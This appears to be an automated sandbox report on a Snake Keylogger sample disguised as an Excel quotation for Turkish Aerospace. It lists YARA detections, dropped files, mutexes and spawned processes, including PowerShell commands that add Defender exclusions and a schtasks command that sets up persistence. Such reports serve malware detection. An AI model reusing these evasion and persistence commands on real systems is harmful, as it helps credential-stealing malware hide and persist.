Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D18BA0	15_2_06D18BA0
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1EB08	15_2_06D1EB08
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D10B20	15_2_06D10B20
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D19328	15_2_06D19328
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1D0F8	15_2_06D1D0F8
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D10040	15_2_06D10040
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1F810	15_2_06D1F810
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D15018	15_2_06D15018
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1F801	15_2_06D1F801
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D10007	15_2_06D10007
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1D999	15_2_06D1D999
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1D9A8	15_2_06D1D9A8
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1295A	15_2_06D1295A

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.0000000004109000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2186688831.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.0000000004127000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2189545224.0000000007CE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2182151240.0000000003117000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2182151240.00000000031BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2178510452.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000000.2130207363.0000000000DAC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamecKOJ.exeB vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3380640952.00000000010F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3379468807.0000000000443000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3381720151.00000000013D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Binary or memory string: OriginalFilenamecKOJ.exeB vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2248, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: xSjByRHuwGV.exe PID: 1936, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: xSjByRHuwGV.exe PID: 5560, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xSjByRHuwGV.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/15@3/3

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

File created: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_03
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Mutant created: \Sessions\1\BaseNamedObjects\ObUrIFfFj
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5584:120:WilError_03

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

File created: C:\Users\user\AppData\Local\Temp\tmp24B8.tmp

Jump to behavior

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003318000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003325000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000032A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000000.2130105371.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, xSjByRHuwGV.exe.0.dr	Binary or memory string: INSERT INTO users (first_name, last_name, email, [password]) VALUES (@firstName, @lastName, @email, @password);

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Virustotal: Detection: 35%
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

File read: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp24B8.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp387E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process created: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe "C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp24B8.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp387E.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process created: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe "C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
